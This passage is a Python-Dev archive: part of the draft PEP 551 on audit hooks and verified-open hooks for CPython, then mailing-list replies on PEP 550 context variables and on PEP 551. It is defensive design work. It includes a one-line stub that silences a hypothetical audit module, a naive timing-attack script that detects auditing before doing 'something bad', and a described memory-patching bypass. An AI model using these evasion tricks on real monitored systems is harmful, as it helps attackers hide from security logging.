but unless the logs are reviewed and analyzed there is no value. Python may impose restrictions in the name of security, but usability may suffer. Different platforms and environments will require different implementations of certain security features, and organizations with the resources to fully customize their runtime should be encouraged to do so. The aim of these changes is to enable system administrators to integrate Python into their existing security systems, without dictating what those systems look like or how they should behave. We propose two API changes to enable this: an Audit Hook?and Verified Open Hook. Both are not set by default, and both require modifications to the entry point binary to enable any functionality. For the purposes of validation and example, we propose a new ``spython``/``spython.exe`` entry point program that enables some basic functionality using these hooks. **However, security-conscious organizations are expected to create their own entry points to meet their own needs.** Audit Hook ---------- In order to achieve security transparency, an API is required to raise messages from within certain operations. These operations are typically deep within the Python runtime or standard library, such as dynamic code compilation, module imports, DNS resolution, or use of certain modules such as ``ctypes``. The new APIs required for audit hooks are:: # Add an auditing hook sys.addaudithook(hook: Callable[str, tuple]) -> None int PySys_AddAuditHook(int (*hook)(const char *event, PyObject *args)); # Raise an event with all auditing hooks sys.audit(str, *args) -> None int PySys_Audit(const char *event, PyObject *args); # Internal API used during Py_Finalize() - not publicly accessible void _Py_ClearAuditHooks(void); Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time, including before ``Py_Initialize()``, or by calling ``sys.addaudithook()`` from Python code. Hooks are never removed or replaced, and existing hooks have an opportunity to refuse to allow new hooks to be added (adding an audit hook is audited, and so preexisting hooks can raise an exception to block the new addition). When events of interest are occurring, code can either call ``PySys_Audit()`` from C (while the GIL is held) or ``sys.audit()``. The string argument is the name of the event, and the tuple contains arguments. A given event name should have a fixed schema for arguments, and both arguments are considered a public API (for a given x.y version of Python), and thus should only change between feature releases with updated documentation. When an event is audited, each hook is called in the order it was added with the event name and tuple. If any hook returns with an exception set, later hooks are ignored and *in general* the Python runtime should terminate. This is intentional to allow hook implementations to decide how to respond to any particular event. The typical responses will be to log the event, abort the operation with an exception, or to immediately terminate the process with an operating system exit call. When an event is audited but no hooks have been set, the ``audit()`` function should include minimal overhead. Ideally, each argument is a reference to existing data?rather than a value calculated just for the auditing call. As hooks may be Python objects, they need to be freed during ``Py_Finalize()``. To do this, we add an internal API ``_Py_ClearAuditHooks()`` that releases any ``PyObject*`` hooks that are held, as well as any heap memory used. This is an internal function with no public export, but it triggers an event for all audit hooks to ensure that unexpected calls are logged. See `Audit Hook Locations`_ for proposed audit hook points and schemas, and the `Recommendations`_ section for discussion on appropriate?responses. Verified Open Hook ------------------ Most operating systems have a mechanism to distinguish between files that can be executed and those that can not. For example, this may be an execute bit in the permissions field, or a verified hash of the file contents to detect potential code tampering. These are an important security mechanism for preventing execution of data or code that is not approved for a given environment. Currently, Python has no way to integrate with these when launching scripts or importing modules. The new public API for the verified open hook is:: # Set the handler int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide)) # Open a file using the handler os.open_for_exec(pathlike) The ``os.open_for_exec()`` function is a drop-in replacement?for ``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw, binary access - any more restrictive behaviour requires the use of a custom handler. (Aside: since ``importlib`` requires access to this function before the ``os`` module has been imported, it will be available on the ``nt``/``posix`` modules, but the intent is that other users will access it through the ``os`` module.) A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is called with a handler set, the handler will be passed the processed narrow or wide path, depending on platform, and its return value will be returned directly. The returned object should be an open file-like object that supports reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance if the open handler has already had to read the file into memory in order to perform whatever verification is necessary to determine whether the content is permitted to be executed. Note that these handlers can import and call the ``_io.open()`` function on CPython without triggering themselves. If the handler determines that the file is not suitable for execution, it should raise an exception of its choice, as well as raising any other auditing events or notifications. All import and execution functionality involving code from a file will be changed to use ``open_for_exec()`` unconditionally.?It is important to note that calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this function - an audit hook that includes the code from these calls will be added and is the best opportunity to validate code that is read from the file. Given the current decoupling between import and execution in Python, most imported code will go through both ``open_for_exec()`` and the log hook for ``compile``, and so care should be taken to avoid repeating verification steps. .. note:: The use of ``open_for_exec()`` by ``importlib`` is a valuable first defence, but should not be relied upon to prevent misuse. In particular, it is easy to monkeypatch ``importlib`` in order to bypass the call. Auditing hooks are the primary way to achieve security transparency, and are essential for detecting API Availability ---------------- While all the functions added here are considered public and stable API, the behavior of the functions is implementation specific. The descriptions here refer?to the CPython?implementation, and while other implementations should provide the functions, there is no requirement that they behave the same. For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but may do nothing. This allows code to make calls to ``sys.audit()`` without having to test for existence, but it should not assume that its call will have any effect. (Including existence tests in security-critical code allows another vector to bypass auditing, so it is preferable that the function always exist.) ``os.open_for_exec(pathlike)`` should at a minimum always return ``_io.open(pathlike, 'rb')``. Code using the function should make no further assumptions about what may occur, and implementations other than CPython are not required to let developers override the behavior of this function with a hook. Audit Hook Locations ==================== Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the following operations with the schema in Table 1. Unless otherwise specified, the ability for audit hooks to abort any listed operation should be considered part of the rationale for including the hook. .. csv-table:: Table 1: Audit Hooks :header: "API Function", "Event Name", "Arguments", "Rationale" :widths: 2, 2, 3, 6 ``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new audit hooks are being added." ``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies hooks they are being cleaned up, mainly in case the event is triggered unexpectedly. This event cannot be aborted." ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects any attempt to set the ``open_for_execute`` handler." "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``, ``PyAST_obj2mod`` ", ``compile``, "``(code, filename_or_none)``", "Detect dynamic code compilation, where ``code`` could be a string or AST. Note that this will be called for regular imports of source code, including those that were opened with ``open_for_exec``." "``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "Detect dynamic execution of code objects. This only occurs for explicit calls, and is not raised for normal function invocation." ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path, sys.path_hooks)``", "Detect when modules are imported. This is raised before the module name is resolved to a file. All arguments other than the module name may be ``None`` if they are not used or available." ``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "Detect dynamic creation of code objects. This only occurs for direct instantiation, and is not raised for normal compilation." "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, " ``(module_or_path,)``", "Detect when native modules are used." ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect information about specific symbols retrieved from native modules." ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code is accessing arbitrary memory using ``ctypes``" ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of objects, which in CPython reveals information about memory layout." ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when code is accessing frames directly" ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is accessing frames directly" ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that ``threading.setprofile`` eventually calls this function, so the event will be audited for each thread." ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that ``threading.settrace`` eventually calls this function, so the event will be audited for each thread." ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", " Detect changes to async generator hooks." ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", " Detect changes to async generator hooks." ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect changes to the coroutine wrapper." ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", " Detect changes to the recursion limit." ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "``(interval_us,)`` ", "Detect changes to the switching interval." "``socket.bind``, ``socket.connect``, ``socket.connect_ex``, ``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect access to network resources. The address is unmodified from the original call." ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect creation of sockets. The arguments will be int values." ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to retrieve the current host name." ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect attempts to change the current host name. The name argument is passed as a bytes object." "``socket.gethostbyname``, ``socket.gethostbyname_ex``", " ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The name argument is a str or bytes object." ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect host resolution. The address argument is a str or bytes object." ``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", " Detect service resolution. The arguments are str objects." ``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", " Detect service resolution. The port argument is an int and protocol is a str." "," ``type.__setattr__``","``(type, attr_name, value)``","Detect monkey patching of types. This event is only raised when the object is an instance of ``type``." "``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``, ``object_set_class``",``object.__setattr__``,"``(object, attr, value)``"," Detect monkey patching of objects. This event is raised for the ``__class__`` attribute and any attribute on ``type`` objects." ``_PyObject_GenericSetAttr``,``object.__delattr__``,"``(object, attr)``"," Detect deletion of object attributes. This event is raised for any attribute on ``type`` objects." ``Unpickler.find_class``,``pickle.find_class``,"``(module_name, global_name)``","Detect imports and global name lookup when unpickling." TODO - more hooks in ``_socket``, ``_ssl``, others? * code objects * function objects SPython Entry Point =================== A new entry point binary will be added, called ``spython.exe`` on Windows and ``spythonX.Y`` on other platforms. This entry point is intended primarily as an example, as we expect most users of this functionality to implement their own entry point and hooks (see `Recommendations`_). It will also be used for tests. Source builds will build ``spython`` by default, but distributions should not include it except as a test binary. The python.org managed binary distributions will not include ``spython``. **Do not accept most command-line arguments** The ``spython`` entry point requires a script file be passed as the first argument, and does not allow any options. This prevents arbitrary code execution from in-memory data or non-script files (such as pickles, which can be executed using ``-m pickle ``. Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables) and ``-s`` (no user site) are assumed. If a file with the same full path as the process with a ``._pth`` suffix (``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be used to initialize ``sys.path`` following the rules currently described `for Windows `_. When built with ``Py_DEBUG``, the ``spython`` entry point will allow a ``-i`` option with no other arguments to enter into interactive mode, with audit messages being written to standard error rather than a file. This is intended for testing and debugging only. **Log security events to a file** Before initialization, ``spython`` will set an audit hook that writes events to a local file. By default, this file is the full path of the process with a ``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment variable (despite such overrides being explicitly discouraged in `Recommendations`_). The audit hook will also abort all ``sys.addaudithook`` events, preventing any other hooks from being added. **Restrict importable modules** Also before initialization, ``spython`` will set an open-for-execute hook that validates all files opened with ``os.open_for_exec``. This implementation will require all files to have a ``.py`` suffix (thereby blocking the use of cached bytecode), and will raise a custom audit event ``spython.open_for_exec`` containing ``(filename, True_if_allowed)``. On Windows, the hook will also open the file with flags that prevent any other process from opening it with write access, which allows the hook to perform additional validation on the contents with confidence that it will not be modified between the check and use. Compilation will later trigger a ``compile`` event, so there is no need to read the contents now for AMSI, but other validation mechanisms such as DeviceGuard [4]_ should be performed here. **Restrict globals in pickles** The ``spython`` entry point will abort all ``pickle.find_class`` events that use the default implementation. Overrides will not raise audit events unless explicitly added, and so they will continue to be allowed. Performance Impact ================== **TODO** Full impact analysis still requires investigation. Preliminary testing shows that calling ``sys.audit`` with no hooks added does not significantly affect any existing benchmarks, though targeted microbenchmarks can observe an impact. Performance impact using ``spython`` or with hooks added are not of interest here, since this is considered opt-in functionality. Recommendations =============== Specific recommendations are difficult to make, as the ideal configuration for any environment will depend on the user's ability to manage, monitor, and respond to activity on their own network. However, many of the proposals here do not appear to be of value without deeper illustration. This section provides recommendations using the terms **should** (or **should not**), indicating that we consider it dangerous to ignore the advice, and **may**, indicating that for the advice ought to be considered for high value systems. The term **sysadmins** refers to whoever is responsible for deploying Python throughout your network; different organizations may have an alternative title for the responsible people. Sysadmins **should** build their own entry point, likely starting from the ``spython`` source, and directly interface with the security systems available in their environment. The more tightly integrated, the less likely a vulnerability will be found allowing an attacker to bypass those systems. In particular, the entry point **should not** obtain any settings from the current environment, such as environment variables, unless those settings are otherwise protected from modification. Audit messages **should not** be written to a local file. The ``spython`` entry point does this for example and testing purposes. On production machines, tools such as ETW [7]_ or auditd [12]_ that are intended for this purpose should be used. The default ``python`` entry point **should not** be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins **may** consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins **may** deploy their own entry point as ``python`` to obscure the fact that extra auditing is being included. Python deployments **should** be made read-only using any available platform functionality after deployment and during use. On platforms that support it, sysadmins **should** include signatures for every file in a Python deployment, ideally verified using a private certificate. For example, Windows supports embedding signatures in executable files and using catalogs for others, and can use DeviceGuard [4]_ to validate signatures either automatically or using an ``open_for_exec`` hook. Sysadmins **should** log as many audited events as possible, and **should** copy logs off of local machines frequently. Even if logs are not being constantly monitored for suspicious activity, once an attack is detected it is too late to enable auditing. Audit hooks **should not** attempt to preemptively filter events, as even benign events are useful when analyzing the progress of an attack. (Watch the "No Easy Breach" video under `Further Reading`_ for a deeper look at this side of things.) Most actions **should not** be aborted if they could ever occur during normal use or if preventing them will encourage attackers to work around them. As described earlier, awareness is a higher priority than prevention. Sysadmins **may** audit their Python code and abort operations that are known to never be used deliberately. Audit hooks **should** write events to logs before attempting to abort. As discussed earlier, it is more important to record malicious actions than to prevent them. Sysadmins **should** identify correlations between events, as a change to correlated events may indicate misuse. For example, module imports will typically trigger the ``import`` auditing event, followed by an ``open_for_exec`` call and usually a ``compile`` event. Attempts to bypass auditing will often suppress some but not all of these events. So if the log contains ``import`` events but not ``compile`` events, investigation may be necessary. The first audit hook **should** be set in C code before ``Py_Initialize`` is called, and that hook **should** unconditionally abort the ``sys.addloghook`` event. The Python interface is primarily intended for testing and development. To prevent audit hooks being added on non-production machines, an entry point **may** add an audit hook that aborts the ``sys.addloghook`` event but otherwise does nothing. On production machines, a non-validating ``open_for_exec`` hook **may** be set in C code before ``Py_Initialize`` is called. This prevents later code from overriding the hook, however, logging the ``setopenforexecutehandler`` event is useful since no code should ever need to call it. Using at least the sample ``open_for_exec`` hook implementation from ``spython`` is recommended. Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed with monkeypatching, an audit hook **should** be used to detect attribute changes on type objects. [TODO: more good advice; less bad advice] Rejected Ideas ============== Separate module for audit hooks ------------------------------- The proposal is to add a new module for audit hooks, hypothetically ``audit``. This would separate the API and implementation from the ``sys`` module, and allow naming the C functions ``PyAudit_AddHook`` and ``PyAudit_Audit`` rather than the current variations. Any such module would need to be a built-in module that is guaranteed to always be present. The nature of these hooks is that they must be callable without condition, as any conditional imports or calls provide more opportunities to intercept and suppress or modify events. Given its nature as one of the most core modules, the ``sys`` module is somewhat protected against module shadowing attacks. Replacing ``sys`` with a sufficiently functional module that the application can still run is a much more complicated task than replacing a module with only one function of interest. An attacker that has the ability to shadow the ``sys`` module is already capable of running arbitrary code from files, whereas an ``audit`` module can be replaced with a single statement:: import sys; sys.modules['audit'] = type('audit', (object,), {'audit': lambda *a: None, 'addhook': lambda *a: None}) Multiple layers of protection already exist for monkey patching attacks against either ``sys`` or ``audit``, but assignments or insertions to ``sys.modules`` are not audited. This idea is rejected because it makes substituting ``audit`` calls throughout all callers near trivial. Flag in sys.flags to indicate "secure" mode ------------------------------------------- The proposal is to add a value in ``sys.flags`` to indicate when Python is running in a "secure" mode. This would allow applications to detect when some features are enabled and modify their behaviour appropriately. Currently there are no guarantees made about security by this PEP - this section is the first time the word "secure" has been used. Security **transparency** does not result in any changed behaviour, so there is no appropriate reason for applications to modify their behaviour. Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are always present and functional, regardless of whether the regular ``python`` entry point or some alternative entry point is used. Callers cannot determine whether any hooks have been added (except by performing side-channel analysis), nor do they need to. The calls should be fast enough that callers do not need to avoid them, and the sysadmin is responsible for ensuring their added hooks are fast enough to not affect application performance. The argument that this is "security by obscurity" is valid, but irrelevant. Security by obscurity is only an issue when there are no other protective mechanisms; obscurity as the first step in avoiding attack is strongly recommended (see `this article `_ for discussion). This idea is rejected because there are no appropriate reasons for an application to change its behaviour based on whether these APIs are in use. Further Reading =============== **Redefining Malware: When Old Terms Pose New Threats** By Aviv Raff for SecurityWeek, 29th January 2014 This article, and those linked by it, are high-level summaries of the rise of APTs and the differences from "traditional" malware. ``_ **Anatomy of a Cyber Attack** By FireEye, accessed 23rd August 2017 A summary of the techniques used by APTs, and links to a number of relevant whitepapers. ``_ **Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection** By Aviv Raff for SecurityWeek, 8th May 2014 High-level summary of the value of detailed logging and automatic analysis. ``_ **No Easy Breach: Challenges and Lessons Learned from an Epic Investigation** Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016 Detailed walkthrough of the processes and tools used in detecting and removing an APT. ``_ **Disrupting Nation State Hackers** Video presented by Rob Joyce for the NSA at USENIX Enigma 2016 Good security practices, capabilities and recommendations from the chief of NSA's Tailored Access Operation. ``_ References ========== .. [1] Assume Breach Mindset, ``_ .. [2] PowerShell Loves the Blue Team, also known as Scripting Security and Protection Advances in Windows 10, ``_ .. [3] ``_ .. [4] ``_ .. [5] AMSI, ``_ .. [6] Persistent Zone Identifiers, ``_ .. [7] Event tracing, ``_ .. [8] ``_ .. [9] ``_ .. [10] ``_ .. [11] ``_ .. [12] ``_ .. [13] SELinux access decisions ``_ Acknowledgments =============== Thanks to all the people from Microsoft involved in helping make the Python runtime safer for production use, and especially to James Powell for doing much of the initial research, analysis and implementation, Lee Holmes for invaluable insights into the info-sec field and PowerShell's responses, and Brett Cannon for the grounding discussions. Copyright ========= Copyright (c) 2017 by Microsoft Corporation. This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/). From njs at pobox.com Mon Aug 28 21:07:44 2017 From: njs at pobox.com (Nathaniel Smith) Date: Mon, 28 Aug 2017 18:07:44 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Mon, Aug 28, 2017 at 3:14 PM, Eric Snow wrote: > On Sat, Aug 26, 2017 at 3:09 PM, Nathaniel Smith wrote: >> You might be interested in these notes I wrote to motivate why we need >> a chain of namespaces, and why simple "async task locals" aren't >> sufficient: >> >> https://github.com/njsmith/pep-550-notes/blob/master/dynamic-scope.ipynb > > Thanks, Nathaniel! That helped me understand the rationale, though > I'm still unconvinced chained lookup is necessary for the stated goal > of the PEP. > > (The rest of my reply is not specific to Nathaniel.) > > tl;dr Please: > * make the chained lookup aspect of the proposal more explicit (and > distinct) in the beginning sections of the PEP (or drop chained > lookup). > * explain why normal frames do not get to take advantage of chained > lookup (or allow them to). > > -------------------- > > If I understood right, the problem is that we always want context vars > resolved relative to the current frame and then to the caller's frame > (and on up the call stack). For generators, "caller" means the frame > that resumed the generator. Since we don't know what frame will > resume the generator beforehand, we can't simply copy the current LC > when a generator is created and bind it to the generator's frame. > > However, I'm still not convinced that's the semantics we need. The > key statement is "and then to the caller's frame (and on up the call > stack)", i.e. chained lookup. On the linked page Nathaniel explained > the position (quite clearly, thank you) using sys.exc_info() as an > example of async-local state. I posit that that example isn't > particularly representative of what we actually need. Isn't the point > of the PEP to provide an async-safe alternative to threading.local()? > > Any existing code using threading.local() would not expect any kind of > chained lookup since threads don't have any. So introducing chained > lookup in the PEP is unnecessary and consequently not ideal since it > introduces significant complexity. There's a lot of Python code out there, and it's hard to know what it all wants :-). But I don't think we should get hung up on matching threading.local() -- no-one sits down and says "okay, what my users want is for me to write some code that uses a thread-local", i.e., threading.local() is a mechanism, not an end-goal. My hypothesis is in most cases, when people reach for threading.local(), it's because they have some "contextual" variable, and they want to be able to do things like set it to a value that affects all and only the code that runs inside a 'with' block. So far the only way to approximate this in Python has been to use threading.local(), but chained lookup would work even better. As evidence for this hypothesis: something like chained lookup is important for exc_info() [1] and for Trio's cancellation semantics, and I'm pretty confident that it's what users naturally expect for use cases like 'with decimal.localcontext(): ...' or 'with numpy.errstate(...): ...'. And it works fine for cases like Flask's request-locals that get set once near the top of a callstack and then treated as read-only by most of the code. I'm not aware of any alternative to chained lookup that fulfills all of these use cases -- are you? And I'm not aware of any use cases that require something more than threading.local() but less than chained lookup -- are you? [1] I guess I should say something about including sys.exc_info() as evidence that chained lookup as useful, given that CPython probably won't share code between it's PEP 550 implementation and its sys.exc_info() implementation. I'm mostly citing it as a evidence that this is a real kind of need that can arise when writing programs -- if it happens once, it'll probably happen again. But I can also imagine that other implementations might want to share code here, and it's certainly nice if the Python-the-language spec can just say "exc_info() has semantics 'as if' it were implemented using PEP 550 storage" and leave it at that. Plus it's kind of rude for the interpreter to claim semantics for itself that it won't let anyone else implement :-). > As the PEP is currently written, chained lookup is a key part of the > proposal, though it does not explicitly express this. I suppose this > is where my confusion has been. > > At this point I think I understand one rationale for the chained > lookup functionality; it takes advantage of the cooperative scheduling > characteristics of generators, et al. Unlike with threads, a > programmer can know the context under which a generator will be > resumed. Thus it may be useful to the programmer to allow (or expect) > the resumed generator to fall back to the calling context. However, > given the extra complexity involved, is there enough evidence that > such capability is sufficiently useful? Could chained lookup be > addressed separately (in another PEP)? > > Also, wouldn't it be equally useful to support chained lookup for > function calls? Programmers have the same level of knowledge about > the context stack with function calls as with generators. I would > expect evidence in favor of chained lookups for generators to also > favor the same for normal function calls. The important difference between generators/coroutines and normal function calls is that with normal function calls, the link between the caller and callee is fixed for the entire lifetime of the inner frame, so there's no way for the context to shift under your feet. If all we had were normal function calls, then (green-) thread locals using the save/restore trick would be enough to handle all the use cases above -- it's only for generators/coroutines where the save/restore trick breaks down. This means that pushing/popping LCs when crossing into/out of a generator frame is the minimum needed to get the desired semantics, and it keeps the LC stack small (important since lookups can be O(n) in the worst case), and it minimizes the backcompat breakage for operations like decimal.setcontext() where people *do* expect to call it in a subroutine and have the effects be visible in the caller. -n -- Nathaniel J. Smith -- https://vorpus.org From steve at pearwood.info Mon Aug 28 21:15:44 2017 From: steve at pearwood.info (Steven D'Aprano) Date: Tue, 29 Aug 2017 11:15:44 +1000 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: Message-ID: <20170829011544.GE9671@ando.pearwood.info> Very nicely written. A few comments below. On Mon, Aug 28, 2017 at 04:55:19PM -0700, Steve Dower wrote: [...] > This PEP describes additions to the Python API and specific behaviors > for the > CPython implementation that make actions taken by the Python runtime > visible to > security and auditing tools. The goals in order of increasing importance [...] Check your line lengths, I think they may be too long? (Or maybe my mail client is set too short?) [...] > To summarize, defenders have a need to audit specific uses of Python in > order to > detect abnormal or malicious usage. Currently, the Python runtime does not > provide any ability to do this, which (anecdotally) has led to organizations > switching to other languages. It would help if the PEP addressed the state of the art in other languages. [...] > For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but > may do > nothing. This allows code to make calls to ``sys.audit()`` without having to > test for existence, but it should not assume that its call will have any > effect. > (Including existence tests in security-critical code allows another > vector to > bypass auditing, so it is preferable that the function always exist.) That suggests a timing attack to infer the existence of auditing. A naive attempt: from time import time f = lambda: None t = time() f() time_to_do_nothing = time() - t audit = sys.audit t = time() audit() time_to_do_audit = time() - t if time_to_do_audit <= time_to_do_nothing: do_something_bad() This is probably too naive to work in real code, but the point is that the attacker may be able to exploit timing differences in sys.audit and related functions to infer whether or not auditing is enabled. -- Steve From greg at krypto.org Mon Aug 28 21:34:29 2017 From: greg at krypto.org (Gregory P. Smith) Date: Tue, 29 Aug 2017 01:34:29 +0000 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: <20170829011544.GE9671@ando.pearwood.info> References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: My gut feeling says that there are N interpreters available on just about every bloated system image out there. Multiple pythons are often among them, other we do not control will also continue to exist. I expect a small initial payload can be created that when executed will binary patch the interpreter's memory to disable all auditing, *potentially* in a manner that cannot be audited itself (a challenge guaranteed to be accepted). If the goal is to audit attacks and the above becomes the standard attack payload boilerplate before existing "use python to pull down 'fun' stuff to execute". It seems to negate the usefulness. This audit layer seems like a defense against existing exploit kits rather than future ones. Is that still useful from a defense in depth point of view? -gps On Mon, Aug 28, 2017 at 6:24 PM Steven D'Aprano wrote: > Very nicely written. A few comments below. > > On Mon, Aug 28, 2017 at 04:55:19PM -0700, Steve Dower wrote: > > [...] > > This PEP describes additions to the Python API and specific behaviors > > for the > > CPython implementation that make actions taken by the Python runtime > > visible to > > security and auditing tools. The goals in order of increasing importance > [...] > > Check your line lengths, I think they may be too long? (Or maybe my mail > client is set too short?) > > > [...] > > To summarize, defenders have a need to audit specific uses of Python in > > order to > > detect abnormal or malicious usage. Currently, the Python runtime does > not > > provide any ability to do this, which (anecdotally) has led to > organizations > > switching to other languages. > > It would help if the PEP addressed the state of the art in other > languages. > > > [...] > > For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but > > may do > > nothing. This allows code to make calls to ``sys.audit()`` without > having to > > test for existence, but it should not assume that its call will have any > > effect. > > (Including existence tests in security-critical code allows another > > vector to > > bypass auditing, so it is preferable that the function always exist.) > > That suggests a timing attack to infer the existence of auditing. > A naive attempt: > > from time import time > f = lambda: None > t = time() > f() > time_to_do_nothing = time() - t > audit = sys.audit > t = time() > audit() > time_to_do_audit = time() - t > if time_to_do_audit <= time_to_do_nothing: > do_something_bad() > > > This is probably too naive to work in real code, but the point is that > the attacker may be able to exploit timing differences in sys.audit and > related functions to infer whether or not auditing is enabled. > > > > -- > Steve > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From guido at python.org Mon Aug 28 21:50:17 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 28 Aug 2017 18:50:17 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Mon, Aug 28, 2017 at 6:07 PM, Nathaniel Smith wrote: > The important difference between generators/coroutines and normal > function calls is that with normal function calls, the link between > the caller and callee is fixed for the entire lifetime of the inner > frame, so there's no way for the context to shift under your feet. If > all we had were normal function calls, then (green-) thread locals > using the save/restore trick would be enough to handle all the use > cases above -- it's only for generators/coroutines where the > save/restore trick breaks down. This means that pushing/popping LCs > when crossing into/out of a generator frame is the minimum needed to > get the desired semantics, and it keeps the LC stack small (important > since lookups can be O(n) in the worst case), and it minimizes the > backcompat breakage for operations like decimal.setcontext() where > people *do* expect to call it in a subroutine and have the effects be > visible in the caller. > I like this way of looking at things. Does this have any bearing on asyncio.Task? To me those look more like threads than like generators. Or possibly they should inherit the lookup chain from the point when the Task was created, but not be affected at all by the lookup chain in place when they are executed. FWIW we *could* have a policy that OS threads also inherit the lookup chain from their creator, but I doubt that's going to fly with backwards compatibility. I guess my general (hurried, sorry) view is that we're at a good point where we have a small number of mechanisms but are still debating policies on how those mechanisms should be used. (The basic mechanism is chained lookup and the policies are about how the chains are fit together for various language/library constructs.) -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From steve.dower at python.org Mon Aug 28 22:23:11 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 19:23:11 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: <20170829011544.GE9671@ando.pearwood.info> References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: On 28Aug2017 1815, Steven D'Aprano wrote: > Very nicely written. A few comments below. > > On Mon, Aug 28, 2017 at 04:55:19PM -0700, Steve Dower wrote: > > [...] >> This PEP describes additions to the Python API and specific behaviors >> for the >> CPython implementation that make actions taken by the Python runtime >> visible to >> security and auditing tools. The goals in order of increasing importance > [...] > > Check your line lengths, I think they may be too long? (Or maybe my mail > client is set too short?) Yeah, not sure what's happened here. Are PEPs supposed to be 80? Or 72? > [...] >> To summarize, defenders have a need to audit specific uses of Python in >> order to >> detect abnormal or malicious usage. Currently, the Python runtime does not >> provide any ability to do this, which (anecdotally) has led to organizations >> switching to other languages. > > It would help if the PEP addressed the state of the art in other > languages. It briefly mentions that PowerShell has integrated similar functionality (generally more invasive, but it's not meant as a full application language). As far as I know, no other languages have done anything at this level - OS-level scripting (WSH, AppleScript) rely on OS-level auditing and don't try to do it within the language. This makes sense from the point of view of "my system made a network connection to x.y.z.w", but doesn't provide the correlating information necessary to see "this Python code downloaded from x.com made a network connection to ...". > [...] >> For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but >> may do >> nothing. This allows code to make calls to ``sys.audit()`` without having to >> test for existence, but it should not assume that its call will have any >> effect. >> (Including existence tests in security-critical code allows another >> vector to >> bypass auditing, so it is preferable that the function always exist.) > > That suggests a timing attack to infer the existence of auditing. > A naive attempt: > [...] > This is probably too naive to work in real code, but the point is that > the attacker may be able to exploit timing differences in sys.audit and > related functions to infer whether or not auditing is enabled. I mention later that timing attacks are possible to determine whether events are being audited. I'm not convinced that provides any usable information though - by the time you can test that you are being tracked, you've (a) already got arbitrary code executing, and (b) have already been caught :) (or at least triggered an event somewhere... may not have flagged any alerts yet, but there's a record) Cheers, Steve From rosuav at gmail.com Mon Aug 28 22:26:58 2017 From: rosuav at gmail.com (Chris Angelico) Date: Tue, 29 Aug 2017 12:26:58 +1000 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: <20170829011544.GE9671@ando.pearwood.info> 